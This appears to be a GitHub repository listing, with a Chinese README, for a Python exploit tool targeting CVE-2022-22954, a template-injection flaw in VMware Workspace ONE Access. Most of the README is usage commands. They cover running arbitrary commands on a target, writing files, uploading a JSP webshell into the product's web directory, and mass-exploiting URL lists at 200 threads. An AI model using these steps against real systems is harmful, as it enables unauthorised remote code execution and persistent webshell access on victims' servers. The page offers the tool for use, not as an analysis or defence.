https://github.com/bewhale/CVE-2022-22954
CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI 漏洞 命令执行、批量检测脚本、文件写入
https://github.com/bewhale/CVE-2022-22954
Last synced: 4 months ago
JSON representation
CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI 漏洞 命令执行、批量检测脚本、文件写入
- Host: GitHub
- URL: https://github.com/bewhale/CVE-2022-22954
- Owner: bewhale
- Created: 2022-04-13T16:18:56.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-04-26T04:26:00.000Z (over 3 years ago)
- Last Synced: 2025-04-29T01:42:23.134Z (7 months ago)
- Language: Python
- Homepage:
- Size: 849 KB
- Stars: 71
- Watchers: 4
- Forks: 21
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - bewhale/CVE-2022-22954 - CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI 漏洞 命令执行、批量检测脚本、文件写入 (Python)
README

多个漏洞触发点检测,多线程批量检测,命令执行,文件写入
```
// 单个目标漏洞检测
python CVE-2022-22954.py -u https://x.x.x.x
// 命令执行
python CVE-2022-22954.py -u https://x.x.x.x -c "id"
// 写文件
python CVE-2022-22954.py -u https://x.x.x.x -fn test.jsp -fc "test"
// 上传文件,windows 设置文件名需要指定路径
python CVE-2022-22954.py -u https://x.x.x.x -fn test.jsp -fp "D:\Desktop\shell.jsp"
// 上传到指定路径
python CVE-2022-22954.py -u https://x.x.x.x -fn "/opt/vmware/horizon/workspace/webapps/catalog-portal/test.jsp" -fp "D:\Desktop\shell.jsp"
// 批量检测,用法一致
python CVE-2022-22954.py -f url.txt
python CVE-2022-22954.py -f url.txt -c "id" -t 200
python CVE-2022-22954.py -f url.txt -fn test.jsp -fc "test" -t 200
python CVE-2022-22954.py -f url.txt -fn test.jsp -fp "D:\Desktop\shell.jsp" -t 200
python CVE-2022-22954.py -f url.txt -fn "/opt/vmware/horizon/workspace/webapps/catalog-portal/test.jsp" -fp "D:\Desktop\shell.jsp" -t 200
```

# 参考文章
https://mp.weixin.qq.com/s/2qHhPs1HcEXVQb7bkC3mcA